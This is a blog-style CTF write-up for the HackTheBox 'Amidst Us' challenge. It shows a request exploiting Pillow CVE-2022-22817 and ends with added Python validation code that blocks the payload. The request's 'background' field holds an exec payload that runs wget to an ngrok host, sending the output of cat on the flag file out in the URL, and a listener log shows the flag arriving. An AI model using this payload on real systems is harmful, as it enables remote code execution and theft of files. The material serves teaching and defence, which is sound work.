Rewdog.com

A personal site that's never done

Cyber Apocalypse CTF 2022 from HackTheBox - Amidst Us

Challenge

The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and Bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?

TL;DR

Use the PoC for PIL CVE-2022-22817 to get RCE, then cat the flag into the URI of an HTTP request sent back to your listening server.

Solution

More Coming Soon

Request sent to the portal:

POST /api/alphafy HTTP/1.1
Host: 138.68.183.64:30700
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Content-Type: application/json
Content-Length: 4952
Connection: close

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","background":["exec('import os;os.system(\"wget http://11-11-11.ngrok.io/?x=$(cat ../flag*)\")')",255,255]}

Listener that receives the flag:

sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
127.0.0.1 - - [17/May/2022 00:28:24] "GET /?x=HTB{i_slept_my_way_to_rce} HTTP/1.1" 200 -
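
From the defender's side, as an added example that is not part of the original write-up or the challenge's code: the request above only works if a string in `background` is allowed to reach the PIL expression evaluator covered by CVE-2022-22817. Assuming the endpoint needs nothing more than three 0-255 integers, a strict check such as the hypothetical `parse_background` below rejects that payload shape before any image code runs; the sample bodies and the `image` key are constructed placeholders.

```python
import json

class BadBackground(ValueError):
    """`background` is not exactly three integers in 0..255."""

def parse_background(raw_body: bytes) -> tuple:
    """Return (r, g, b) from a JSON request body or raise BadBackground."""
    try:
        doc = json.loads(raw_body)
    except ValueError as exc:  # JSONDecodeError and UnicodeDecodeError
        raise BadBackground("body is not valid JSON") from exc
    if not isinstance(doc, dict):
        raise BadBackground("body must be a JSON object")
    bg = doc.get("background")
    if not isinstance(bg, list) or len(bg) != 3:
        raise BadBackground("background must be a list of three channels")
    for i, value in enumerate(bg):
        # type() rather than isinstance(): bool subclasses int, and a string
        # must be rejected outright, never coerced or passed along.
        if type(value) is not int:
            raise BadBackground(f"channel {i} is {type(value).__name__}, expected int")
        if not 0 <= value <= 255:
            raise BadBackground(f"channel {i} out of range: {value}")
    return tuple(bg)

def classify(raw_body: bytes) -> str:
    """One-line verdict suitable for an access log."""
    try:
        return f"accepted {parse_background(raw_body)}"
    except BadBackground as exc:
        return f"rejected: {exc}"

# Constructed sample bodies; the "image" key and its value are placeholders.
SAMPLES = [
    b'{"image":"<base64>","background":[255,255,255]}',
    b'{"image":"<base64>","background":["exec(\'...\')",255,255]}',
    b'{"image":"<base64>","background":[true,255,255]}',
    b'{"image":"<base64>","background":[0,0,256]}',
    b'{"image":"<base64>","background":[0,0]}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(body))
```

Input validation of this kind complements, and does not replace, running a Pillow release that contains the fix for the CVE.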